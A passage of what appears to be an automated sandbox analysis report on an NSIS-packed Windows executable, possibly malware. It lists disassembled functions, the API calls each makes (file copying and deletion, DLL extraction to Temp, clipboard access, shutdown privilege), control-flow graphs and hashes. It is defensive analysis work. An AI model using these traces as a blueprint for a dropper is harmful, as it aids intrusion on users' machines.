                                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\160420241245287.exe,0041FE90,00000001), ref: 004036DA
                                                                        • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                        • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                        • ExitProcess.KERNEL32 ref: 004037BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                        • String ID: "C:\Users\user\Desktop\160420241245287.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\opbevaringssteder$C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs$C:\Users\user\Desktop$C:\Users\user\Desktop\160420241245287.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                        • API String ID: 4107622049-4150488388
                                                                        • Opcode ID: 80b4d66530e30df5463f20323155bb533901e0ea7c2273a5282726b8b5686b27
                                                                        • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                        • Opcode Fuzzy Hash: 80b4d66530e30df5463f20323155bb533901e0ea7c2273a5282726b8b5686b27
                                                                        • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004052D3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 231 4052d3-4052ee 232 4052f4-4053bd GetDlgItem * 3 call 404164 call 404a31 GetClientRect GetSystemMetrics SendMessageW * 2 231->232 233 40547f-405486 231->233 255 4053db-4053de 232->255 256 4053bf-4053d9 SendMessageW * 2 232->256 235 4054b0-4054bd 233->235 236 405488-4054aa GetDlgItem CreateThread FindCloseChangeNotification 233->236 238 4054db-4054e5 235->238 239 4054bf-4054c5 235->239 236->235 243 4054e7-4054ed 238->243 244 40553b-40553f 238->244 241 405500-405509 call 404196 239->241 242 4054c7-4054d6 ShowWindow * 2 call 404164 239->242 252 40550e-405512 241->252 242->238 249 405515-405525 ShowWindow 243->249 250 4054ef-4054fb call 404108 243->250 244->241 247 405541-405547 244->247 247->241 257 405549-40555c SendMessageW 247->257 253 405535-405536 call 404108 249->253 254 405527-405530 call 405194 249->254 250->241 253->244 254->253 260 4053e0-4053ec SendMessageW 255->260 261 4053ee-405405 call 40412f 255->261 256->255 262 405562-40558d CreatePopupMenu call 405f0c AppendMenuW 257->262 263 40565e-405660 257->263 260->261 268 405407-40541b ShowWindow 261->268 269 40543b-40545c GetDlgItem SendMessageW 261->269 270 4055a2-4055b7 TrackPopupMenu 262->270 271 40558f-40559f GetWindowRect 262->271 263->252 272 40542a 268->272 273 40541d-405428 ShowWindow 268->273 269->263 275 405462-40547a SendMessageW * 2 269->275 270->263 274 4055bd-4055d4 270->274 271->270 276 405430-405436 call 404164 272->276 273->276 277 4055d9-4055f4 SendMessageW 274->277 275->263 276->269 277->277 278 4055f6-405619 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 277->278 280 40561b-405642 SendMessageW 278->280 280->280 281 405644-405658 GlobalUnlock SetClipboardData CloseClipboard 280->281 281->263
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                        • GetClientRect.USER32(?,?), ref: 0040537E
                                                                        • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                          • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054AA
                                                                        • ShowWindow.USER32(00000000), ref: 004054CE
                                                                        • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                        • ShowWindow.USER32(00000008), ref: 0040551D
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                        • CreatePopupMenu.USER32 ref: 00405562
                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                        • GetWindowRect.USER32(?,?), ref: 00405596
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                        • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                        • EmptyClipboard.USER32 ref: 004055FD
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                        • CloseClipboard.USER32 ref: 00405658
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                        • String ID: {
                                                                        • API String ID: 4154960007-366298937
                                                                        • Opcode ID: 99f6d0e2163b3ed1e469e9123c156a5dd4617cf360879a3f8359da01de5b186a
                                                                        • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                        • Opcode Fuzzy Hash: 99f6d0e2163b3ed1e469e9123c156a5dd4617cf360879a3f8359da01de5b186a
                                                                        • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405F0C Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 527 405f0c-405f17 528 405f19-405f28 527->528 529 405f2a-405f40 527->529 528->529 530 405f46-405f53 529->530 531 406158-40615e 529->531 530->531 532 405f59-405f60 530->532 533 406164-40616f 531->533 534 405f65-405f72 531->534 532->531 536 406171-406175 call 405eea 533->536 537 40617a-40617b 533->537 534->533 535 405f78-405f84 534->535 538 406145 535->538 539 405f8a-405fc6 535->539 536->537 541 406153-406156 538->541 542 406147-406151 538->542 543 4060e6-4060ea 539->543 544 405fcc-405fd7 GetVersion 539->544 541->531 542->531 547 4060ec-4060f0 543->547 548 40611f-406123 543->548 545 405ff1 544->545 546 405fd9-405fdd 544->546 554 405ff8-405fff 545->554 546->545 551 405fdf-405fe3 546->551 552 406100-40610d call 405eea 547->552 553 4060f2-4060fe call 405e31 547->553 549 406132-406143 lstrlenW 548->549 550 406125-40612d call 405f0c 548->550 549->531 550->549 551->545 556 405fe5-405fe9 551->556 565 406112-40611b 552->565 553->565 558 406001-406003 554->558 559 406004-406006 554->559 556->545 561 405feb-405fef 556->561 558->559 563 406042-406045 559->563 564 406008-40602e call 405db7 559->564 561->554 568 406055-406058 563->568 569 406047-406053 GetSystemDirectoryW 563->569 575 406034-40603d call 405f0c 564->575 576 4060cd-4060d1 564->576 565->549 567 40611d 565->567 571 4060de-4060e4 call 40617e 567->571 573 4060c3-4060c5 568->573 574 40605a-406068 GetWindowsDirectoryW 568->574 572 4060c7-4060cb 569->572 571->549 572->571 572->576 573->572 577 40606a-406074 573->577 574->573 575->572 576->571 580 4060d3-4060d9 lstrcatW 576->580 582 406076-406079 577->582 583 40608e-4060a4 SHGetSpecialFolderLocation 577->583 580->571 582->583 585 40607b-406082 582->585 586 4060a6-4060bd SHGetPathFromIDListW CoTaskMemFree 583->586 587 4060bf 583->587 588 40608a-40608c 585->588 586->572 586->587 587->573 588->572 588->583
                                                                        APIs
                                                                        • GetVersion.KERNEL32(00000000,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,?,004051CB,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000), ref: 00405FCF
                                                                        • GetSystemDirectoryW.KERNEL32(ExecToStack,00000400), ref: 0040604D
                                                                        • GetWindowsDirectoryW.KERNEL32(ExecToStack,00000400), ref: 00406060
                                                                        • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                        • SHGetPathFromIDListW.SHELL32(?,ExecToStack), ref: 004060AA
                                                                        • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                        • lstrcatW.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                        • lstrlenW.KERNEL32(ExecToStack,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,?,004051CB,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000), ref: 00406133
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                        • String ID: ExecToStack$Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 900638850-4014221499
                                                                        • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                        • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                        • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                        • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405772 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 589 405772-405798 call 405a3d 592 4057b1-4057b8 589->592 593 40579a-4057ac DeleteFileW 589->593 595 4057ba-4057bc 592->595 596 4057cb-4057db call 405eea 592->596 594 40592e-405932 593->594 597 4057c2-4057c5 595->597 598 4058dc-4058e1 595->598 602 4057ea-4057eb call 405981 596->602 603 4057dd-4057e8 lstrcatW 596->603 597->596 597->598 598->594 601 4058e3-4058e6 598->601 604 4058f0-4058f8 call 40622d 601->604 605 4058e8-4058ee 601->605 607 4057f0-4057f4 602->607 603->607 604->594 613 4058fa-40590e call 405935 call 40572a 604->613 605->594 610 405800-405806 lstrcatW 607->610 611 4057f6-4057fe 607->611 612 40580b-405827 lstrlenW FindFirstFileW 610->612 611->610 611->612 614 4058d1-4058d5 612->614 615 40582d-405835 612->615 629 405910-405913 613->629 630 405926-405929 call 405194 613->630 614->598 620 4058d7 614->620 617 405855-405869 call 405eea 615->617 618 405837-40583f 615->618 631 405880-40588b call 40572a 617->631 632 40586b-405873 617->632 621 405841-405849 618->621 622 4058b4-4058c4 FindNextFileW 618->622 620->598 621->617 625 40584b-405853 621->625 622->615 628 4058ca-4058cb FindClose 622->628 625->617 625->622 628->614 629->605 633 405915-405924 call 405194 call 405d84 629->633 630->594 640 4058ac-4058af call 405194 631->640 641 40588d-405890 631->641 632->622 634 405875-40587e call 405772 632->634 633->594 634->622 640->622 644 405892-4058a2 call 405194 call 405d84 641->644 645 4058a4-4058aa 641->645 644->622 645->622
                                                                        APIs
                                                                        • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\160420241245287.exe"), ref: 0040579B
                                                                        • lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E3
                                                                        • lstrcatW.KERNEL32(?,00409014), ref: 00405806
                                                                        • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\160420241245287.exe"), ref: 0040580C
                                                                        • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\160420241245287.exe"), ref: 0040581C
                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                        • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                        Strings
                                                                        • "C:\Users\user\Desktop\160420241245287.exe", xrefs: 0040577B
                                                                        • \*.*, xrefs: 004057DD
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405780
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\160420241245287.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-2868644625
                                                                        • Opcode ID: 907ff43fcfdba52205f9394a3d7f513bd1de32a06ab12d058cf23db4451ea630
                                                                        • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                        • Opcode Fuzzy Hash: 907ff43fcfdba52205f9394a3d7f513bd1de32a06ab12d058cf23db4451ea630
                                                                        • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040653F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                        • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                        • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                        • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040622D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,74DF2EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00406238
                                                                        • FindClose.KERNEL32(00000000), ref: 00406244
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID: WB
                                                                        • API String ID: 2295610775-2854515933
                                                                        • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                        • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                        • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                        • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406254 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                        • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                        • String ID:
                                                                        • API String ID: 310444273-0
                                                                        • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                        • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                        • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                        • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004038B4 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
